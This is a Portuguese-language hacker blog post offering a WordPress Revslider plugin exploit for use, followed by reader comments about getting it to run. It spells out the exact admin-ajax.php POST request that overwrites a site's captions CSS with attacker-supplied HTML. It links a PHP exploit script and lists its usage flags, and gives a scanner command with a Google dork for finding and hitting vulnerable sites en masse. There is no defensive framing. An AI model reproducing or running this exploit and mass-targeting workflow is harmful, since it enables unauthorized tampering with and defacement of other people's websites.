Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

terça-feira, 24 de março de 2015

WORDPRESS Revslider Exploit (0DAY) / INURL - BRASIL

WORDPRESS EXPLOIT Revslider

Exploit que possibilita modificação do arquivo HTML da pagina, o plugin Revslider da plataforma CMS Wordpress é bem conhecido por outras brechas de segurança, pois bem dessa vez é possível fazer uma pequena modificação do arquivo get_captions_css.

Exploit que possibilita modificação do arquivo HTML da pagina, o plugin Revslider da plataforma CMS Wordpress  é bem conhecido por outras brechas de segurança, pois bem dessa vez é possível fazer uma pequena modificação do arquivo get_captions_css. 

Enviando a requisição:
Via post com seguintes campos:
array(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
 "data" => "_YOU_HTML_ADD_"
 );

Dentro no campo data é onde enviamos nosso HTML modificado.
Nossa array post com os dados já previamente preechidos são enviados para seguinte
URL - POST: http://{target}/wp-admin/admin-ajax.php

Com todo processo terminado podemos verifica se foi modificado o HTML do alvo.
URL - FINAL:  http://{target}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css 

USANDO EXPLOIT : 
DOWNLOAD:  http://pastebin.com/a2LHiD7U

EXECUTE:
    -t : SET TARGET.
    -f : SET FILE TARGETS.
    -p : SET PROXY
    Execute:
         php exploit.php -t target
         php exploit.php -f targets
         php exploit.php -t target -p 'http://localhost:9090'

OUTPUT COMAND -t:
OUTPUT: WORDPRESS Revslider Exploit (0DAY) / INURL - BRASIL

OUTPUT COMAND -f targets.txt:
OUTPUT COMAND -f targets.txt:


Usando em massa com SCANNER INURLBR:
DOWNLOAD:
https://github.com/googleinurl/SCANNER-INURLBR 

COMANDO:
./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt  -q 1,6  --comand-all 'php inurl_revslider.php -t _TARGET_'

OUTPUT:
OUTPUT: ./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt -q 1,6 --comand-all 'php inurl_revslider.php -t _TARGET_'
By: às
Marcadores: , , , , , ,

5 comentários:

  1. Anônimo31 de março de 2015 às 22:56

    Where is the content saved? Can't find it on the homepage HTML. Is it saved in some CSS?

    ResponderExcluir
    Respostas
    1. Anônimo31 de março de 2015 às 23:03

      It was put here, so it's not executed as HTML only CSS /wp-content/plugins/revslider/rs-plugin/css/captions.css

      Excluir
  2. pimen8 de setembro de 2015 às 21:42

    i use scan dork but i can't file save in folder output, why?
    i use OS windows

    ResponderExcluir
  3. Unknown9 de setembro de 2015 às 05:30

    I tried it but error comes like

    PHP Fatal error: Call to undefined function curl_init() in /root/Desktop/PHP/WORDPRESS-Revslider-Exploit-0DAY-master/xplRslide.php on line 111

    Fatal error: Call to undefined function curl_init() in /root/Desktop/PHP/WORDPRESS-Revslider-Exploit-0DAY-master/xplRslide.php on line 111

    how to resolve?

    ResponderExcluir
  4. Anônimo8 de janeiro de 2016 às 05:15

    how to resolve?
    U have to install curl php extension.

    ResponderExcluir

............

Assinar: Postar comentários (Atom)